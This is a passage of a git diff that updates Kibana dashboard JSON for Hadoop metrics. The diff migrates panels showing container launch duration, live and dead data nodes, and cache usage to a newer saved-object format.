"96afed27-0108-42ad-a3c6-26f51cd509a2" - ], - "columns": { - "49bd7898-d477-456f-bebd-db0024ea1510": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "96afed27-0108-42ad-a3c6-26f51cd509a2": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.node_manager.container_launch_duration_avg_time: *" - }, - "isBucketed": false, - "label": "Container Launch Duration Avg Time (s)", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.node_manager.container_launch_duration_avg_time" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "d73deed1-d0bd-4f83-8759-602565e70486", - "key": "hadoop.node_manager.container_launch_duration_avg_time", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.node_manager.container_launch_duration_avg_time" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "96afed27-0108-42ad-a3c6-26f51cd509a2" - ], - "layerId": "ee8bbb4c-7f64-46b1-965b-daec27ad4251", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "xAccessor": "49bd7898-d477-456f-bebd-db0024ea1510", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "96afed27-0108-42ad-a3c6-26f51cd509a2" - } - ] - } - ], - "legend": { - "isVisible": 
true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "Timestamp", - "yTitle": "Seconds" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "6c5f4d9b-3a70-4c21-a292-32654686b081", + "key": "hadoop.node_manager.containers.failed", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.node_manager.containers.failed" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "7f0d3056-6f50-4be9-8a4b-cd51685676ec", - "w": 21, - "x": 27, - "y": 0 + "layers": [ + { + "accessors": [ + "927733e5-8d32-42b5-8b05-e27fb1e2adfc", + "4b6e5372-3e5e-4650-9b95-d6b81250436a", + "331edd36-c03b-4cc5-ba1b-8844d0381903" + ], + "layerId": "b8ee20df-453e-488f-806e-6f4079a76be6", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "xAccessor": "36dd81fa-f21e-4abd-b930-ad133b3feb10", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "927733e5-8d32-42b5-8b05-e27fb1e2adfc" + }, + { + "axisMode": "left", + "forAccessor": "4b6e5372-3e5e-4650-9b95-d6b81250436a" + }, + { + "axisMode": "left", + "forAccessor": "331edd36-c03b-4cc5-ba1b-8844d0381903" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true }, - "panelIndex": "7f0d3056-6f50-4be9-8a4b-cd51685676ec", - "title": "Container average launch duration over time [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" + "preferredSeriesType": "area", + "title": "Empty XY 
chart", + "valueLabels": "hide", + "xTitle": "Timestamp", + "yTitle": "Containers" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-ba699ab1-d553-4822-aadd-db43254f7ab0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "052473c7-2ada-4644-b652-9157af03b3b0", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "ba699ab1-d553-4822-aadd-db43254f7ab0": { - "columnOrder": [ - "d751311f-5a11-4dcb-a55a-78ef1be7d79e" - ], - "columns": { - "d751311f-5a11-4dcb-a55a-78ef1be7d79e": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.node_manager.container_launch_duration_num_ops: *" - }, - "isBucketed": false, - "label": "Container Launch Duration (Num of Operations)", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.node_manager.container_launch_duration_num_ops" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "052473c7-2ada-4644-b652-9157af03b3b0", - "key": "hadoop.node_manager.container_launch_duration_num_ops", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.node_manager.container_launch_duration_num_ops" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "d751311f-5a11-4dcb-a55a-78ef1be7d79e", - "layerId": "ba699ab1-d553-4822-aadd-db43254f7ab0", - "layerType": "data", - "textAlign": "center", - "titlePosition": "bottom" - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Number of containers over time [Metrics Hadoop]" 
+ }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "7f0d3056-6f50-4be9-8a4b-cd51685676ec", + "w": 21, + "x": 27, + "y": 0 + }, + "panelIndex": "7f0d3056-6f50-4be9-8a4b-cd51685676ec", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-ee8bbb4c-7f64-46b1-965b-daec27ad4251", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d73deed1-d0bd-4f83-8759-602565e70486", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "ee8bbb4c-7f64-46b1-965b-daec27ad4251": { + "columnOrder": [ + "49bd7898-d477-456f-bebd-db0024ea1510", + "96afed27-0108-42ad-a3c6-26f51cd509a2" + ], + "columns": { + "49bd7898-d477-456f-bebd-db0024ea1510": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "96afed27-0108-42ad-a3c6-26f51cd509a2": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.node_manager.container_launch_duration_avg_time: *" + }, + "isBucketed": false, + "label": "Container Launch Duration Avg Time (s)", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.node_manager.container_launch_duration_avg_time" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "d73deed1-d0bd-4f83-8759-602565e70486", + "key": "hadoop.node_manager.container_launch_duration_avg_time", + "negate": false, + "type": "exists", + 
"value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.node_manager.container_launch_duration_avg_time" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 6, - "i": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b", - "w": 21, - "x": 27, - "y": 14 + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "panelIndex": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b", - "title": "Container launch duration number of operations [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - } - ], - "timeRestore": false, - "title": "[Metrics Hadoop] Node Manager", - "version": 1 - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-70125ec0-cf78-11ec-bc3e-6faca2b11df2", - "migrationVersion": { - "dashboard": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "de277d30-051b-4343-b67b-b6b243c140f2:indexpattern-datasource-layer-b8ee20df-453e-488f-806e-6f4079a76be6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "de277d30-051b-4343-b67b-b6b243c140f2:50203b57-c1ac-4ab0-82eb-c7ca168bb650", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "de277d30-051b-4343-b67b-b6b243c140f2:9b40dc83-210d-44d7-bbe3-549fbcdb09cb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "de277d30-051b-4343-b67b-b6b243c140f2:6c5f4d9b-3a70-4c21-a292-32654686b081", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7f0d3056-6f50-4be9-8a4b-cd51685676ec:indexpattern-datasource-layer-ee8bbb4c-7f64-46b1-965b-daec27ad4251", - "type": "index-pattern" + "layers": [ + { + "accessors": [ + "96afed27-0108-42ad-a3c6-26f51cd509a2" + ], + "layerId": "ee8bbb4c-7f64-46b1-965b-daec27ad4251", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "49bd7898-d477-456f-bebd-db0024ea1510", + "yConfig": [ + { + 
"axisMode": "left", + "forAccessor": "96afed27-0108-42ad-a3c6-26f51cd509a2" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "Timestamp", + "yTitle": "Seconds" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "7f0d3056-6f50-4be9-8a4b-cd51685676ec:d73deed1-d0bd-4f83-8759-602565e70486", - "type": "index-pattern" + "title": "Container average launch duration over time [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b", + "w": 21, + "x": 27, + "y": 14 }, - { - "id": "metrics-*", - "name": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b:indexpattern-datasource-layer-ba699ab1-d553-4822-aadd-db43254f7ab0", - "type": "index-pattern" + "panelIndex": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-ba699ab1-d553-4822-aadd-db43254f7ab0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "052473c7-2ada-4644-b652-9157af03b3b0", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "ba699ab1-d553-4822-aadd-db43254f7ab0": { + "columnOrder": [ + "d751311f-5a11-4dcb-a55a-78ef1be7d79e" + ], + "columns": { + "d751311f-5a11-4dcb-a55a-78ef1be7d79e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.node_manager.container_launch_duration_num_ops: *" + }, + "isBucketed": false, + "label": "Container Launch Duration (Num of Operations)", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": 
"hadoop.node_manager.container_launch_duration_num_ops" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "052473c7-2ada-4644-b652-9157af03b3b0", + "key": "hadoop.node_manager.container_launch_duration_num_ops", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.node_manager.container_launch_duration_num_ops" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "d751311f-5a11-4dcb-a55a-78ef1be7d79e", + "layerId": "ba699ab1-d553-4822-aadd-db43254f7ab0", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" }, - { - "id": "metrics-*", - "name": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b:052473c7-2ada-4644-b652-9157af03b3b0", - "type": "index-pattern" - } + "title": "Container launch duration number of operations [Metrics Hadoop]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Hadoop] Node Manager", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "de277d30-051b-4343-b67b-b6b243c140f2:indexpattern-datasource-layer-b8ee20df-453e-488f-806e-6f4079a76be6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "de277d30-051b-4343-b67b-b6b243c140f2:50203b57-c1ac-4ab0-82eb-c7ca168bb650", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "de277d30-051b-4343-b67b-b6b243c140f2:9b40dc83-210d-44d7-bbe3-549fbcdb09cb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "de277d30-051b-4343-b67b-b6b243c140f2:6c5f4d9b-3a70-4c21-a292-32654686b081", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"7f0d3056-6f50-4be9-8a4b-cd51685676ec:indexpattern-datasource-layer-ee8bbb4c-7f64-46b1-965b-daec27ad4251", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7f0d3056-6f50-4be9-8a4b-cd51685676ec:d73deed1-d0bd-4f83-8759-602565e70486", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b:indexpattern-datasource-layer-ba699ab1-d553-4822-aadd-db43254f7ab0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b:052473c7-2ada-4644-b652-9157af03b3b0", + "type": "index-pattern" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/hadoop/kibana/dashboard/hadoop-c06fb680-cf76-11ec-bc3e-6faca2b11df2.json b/packages/hadoop/kibana/dashboard/hadoop-c06fb680-cf76-11ec-bc3e-6faca2b11df2.json index d85c6386c9c..bbc16094cc3 100644 --- a/packages/hadoop/kibana/dashboard/hadoop-c06fb680-cf76-11ec-bc3e-6faca2b11df2.json +++ b/packages/hadoop/kibana/dashboard/hadoop-c06fb680-cf76-11ec-bc3e-6faca2b11df2.json 
@@ -1,495 +1,1143 @@ { - "attributes": { - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "hadoop-c06fb680-cf76-11ec-bc3e-6faca2b11df2", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:16:59.199Z", + "created_at": "2023-11-07T17:16:59.199Z", + "version": "WzEwMSwxXQ==", + "attributes": { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "ee57a119-2827-4586-82f1-c796c86d76d9": { + "columnOrder": [ + "abfc2ae3-27f7-4529-a9b9-01d7a9896323", + "0a1b5433-d3cf-4c1d-8e22-137912b624bb" + ], + "columns": { + "0a1b5433-d3cf-4c1d-8e22-137912b624bb": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "abfc2ae3-27f7-4529-a9b9-01d7a9896323": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Data node address", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "0a1b5433-d3cf-4c1d-8e22-137912b624bb", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "service.address" + } + }, + "incompleteColumns": {} + } + } } - } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"hadoop.datanode\" " + }, + 
"visualization": { + "columns": [ + { + "columnId": "abfc2ae3-27f7-4529-a9b9-01d7a9896323", + "isTransposed": false + }, + { + "columnId": "0a1b5433-d3cf-4c1d-8e22-137912b624bb", + "isTransposed": false + } + ], + "layerId": "ee57a119-2827-4586-82f1-c796c86d76d9", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "List of data node address [Metrics Hadoop]", + "visualizationType": "lnsDatatable", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-ee57a119-2827-4586-82f1-c796c86d76d9", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 12, + "i": "1f52942c-5657-4bab-8e38-5cf69692f448", + "w": 24, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 12, - "i": "1f52942c-5657-4bab-8e38-5cf69692f448", - "w": 24, - "x": 0, - "y": 0 - }, - "panelIndex": "1f52942c-5657-4bab-8e38-5cf69692f448", - "panelRefName": "panel_1f52942c-5657-4bab-8e38-5cf69692f448", - "type": "lens", - "version": "8.3.0" + "panelIndex": "1f52942c-5657-4bab-8e38-5cf69692f448", + "type": "lens", + "version": "8.6.0" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "eac20ac9-93ca-483c-ab27-d10a06f4dde0", + "w": 12, + "x": 24, + "y": 0 + }, + "panelIndex": "eac20ac9-93ca-483c-ab27-d10a06f4dde0", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-df057b77-cd5b-4e7a-bb21-ac003f0f4eb8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "50b51ba8-f87e-405f-8a53-efea43df987b", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "df057b77-cd5b-4e7a-bb21-ac003f0f4eb8": { + "columnOrder": 
[ + "f15f3a76-5e86-400f-9af5-c6ab810ffb8e" + ], + "columns": { + "f15f3a76-5e86-400f-9af5-c6ab810ffb8e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.namenode.nodes.num_live_data: *" + }, + "isBucketed": false, + "label": "Live Data Nodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.namenode.nodes.num_live_data" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "50b51ba8-f87e-405f-8a53-efea43df987b", + "key": "hadoop.namenode.nodes.num_live_data", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.namenode.nodes.num_live_data" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "f15f3a76-5e86-400f-9af5-c6ab810ffb8e", + "layerId": "df057b77-cd5b-4e7a-bb21-ac003f0f4eb8", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-df057b77-cd5b-4e7a-bb21-ac003f0f4eb8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "50b51ba8-f87e-405f-8a53-efea43df987b", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "df057b77-cd5b-4e7a-bb21-ac003f0f4eb8": { - "columnOrder": [ - "f15f3a76-5e86-400f-9af5-c6ab810ffb8e" - ], - "columns": { - "f15f3a76-5e86-400f-9af5-c6ab810ffb8e": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.namenode.nodes.num_live_data: *" - }, - "isBucketed": false, - "label": "Live Data Nodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, 
- "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.namenode.nodes.num_live_data" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "50b51ba8-f87e-405f-8a53-efea43df987b", - "key": "hadoop.namenode.nodes.num_live_data", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.namenode.nodes.num_live_data" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "f15f3a76-5e86-400f-9af5-c6ab810ffb8e", - "layerId": "df057b77-cd5b-4e7a-bb21-ac003f0f4eb8", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 7, - "i": "eac20ac9-93ca-483c-ab27-d10a06f4dde0", - "w": 12, - "x": 24, - "y": 0 - }, - "panelIndex": "eac20ac9-93ca-483c-ab27-d10a06f4dde0", - "title": "Number of live data nodes [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of live data nodes [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "75574416-a16d-43be-a303-2dc31359a8c9", + "w": 12, + "x": 36, + "y": 0 + }, + "panelIndex": "75574416-a16d-43be-a303-2dc31359a8c9", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-3d40213c-fe67-4c30-bde1-5450fbadcd20", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "0fdf9d17-fb31-40a8-b8db-02850b080c9d", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + 
"3d40213c-fe67-4c30-bde1-5450fbadcd20": { + "columnOrder": [ + "b48d5a8f-56b6-4418-bab1-ce62ea15f724" + ], + "columns": { + "b48d5a8f-56b6-4418-bab1-ce62ea15f724": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.namenode.nodes.num_dead_data: *" + }, + "isBucketed": false, + "label": "Dead Data Nodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.namenode.nodes.num_dead_data" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "0fdf9d17-fb31-40a8-b8db-02850b080c9d", + "key": "hadoop.namenode.nodes.num_dead_data", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.namenode.nodes.num_dead_data" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b48d5a8f-56b6-4418-bab1-ce62ea15f724", + "layerId": "3d40213c-fe67-4c30-bde1-5450fbadcd20", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-3d40213c-fe67-4c30-bde1-5450fbadcd20", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "0fdf9d17-fb31-40a8-b8db-02850b080c9d", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "3d40213c-fe67-4c30-bde1-5450fbadcd20": { - "columnOrder": [ - "b48d5a8f-56b6-4418-bab1-ce62ea15f724" - ], - "columns": { - "b48d5a8f-56b6-4418-bab1-ce62ea15f724": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.namenode.nodes.num_dead_data: *" - }, - "isBucketed": false, - "label": "Dead Data Nodes", - 
"operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.namenode.nodes.num_dead_data" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "0fdf9d17-fb31-40a8-b8db-02850b080c9d", - "key": "hadoop.namenode.nodes.num_dead_data", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.namenode.nodes.num_dead_data" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of dead data nodes [Metrics Hadoop]" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "efa00ae4-03e1-45c9-aaa9-47610de989d9": { + "columnOrder": [ + "5e28f952-df42-4162-8195-af6ee018c227", + "5e28f952-df42-4162-8195-af6ee018c227X0" + ], + "columns": { + "5e28f952-df42-4162-8195-af6ee018c227": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Cache used", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "visualization": { - "accessor": "b48d5a8f-56b6-4418-bab1-ce62ea15f724", - "layerId": "3d40213c-fe67-4c30-bde1-5450fbadcd20", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } + "formula": "last_value(hadoop.datanode.cache.used)", + "isFormulaBroken": false + }, + "references": [ + "5e28f952-df42-4162-8195-af6ee018c227X0" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 7, - "i": 
"75574416-a16d-43be-a303-2dc31359a8c9", - "w": 12, - "x": 36, - "y": 0 - }, - "panelIndex": "75574416-a16d-43be-a303-2dc31359a8c9", - "title": "Number of dead data nodes [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" + "5e28f952-df42-4162-8195-af6ee018c227X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Cache used", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.datanode.cache.used" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"hadoop.datanode\" and hadoop.datanode.cache.capacity : * and hadoop.datanode.cache.used : * " + }, + "visualization": { + "accessor": "5e28f952-df42-4162-8195-af6ee018c227", + "layerId": "efa00ae4-03e1-45c9-aaa9-47610de989d9", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 7, - "i": "c8a6b036-ae93-4055-aef7-dd575221f10d", - "w": 12, - "x": 24, - "y": 7 - }, - "panelIndex": "c8a6b036-ae93-4055-aef7-dd575221f10d", - "panelRefName": "panel_c8a6b036-ae93-4055-aef7-dd575221f10d", - "type": "lens", - "version": "8.3.0" + "title": "Cache used from total cache [Metrics Hadoop]", + "visualizationType": "lnsLegacyMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-efa00ae4-03e1-45c9-aaa9-47610de989d9", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 7, + "i": "c8a6b036-ae93-4055-aef7-dd575221f10d", + "w": 12, + "x": 24, + "y": 7 + }, + "panelIndex": "c8a6b036-ae93-4055-aef7-dd575221f10d", + "type": "lens", + "version": "8.6.0" + }, + { + "version": "8.7.0", + "type": "lens", 
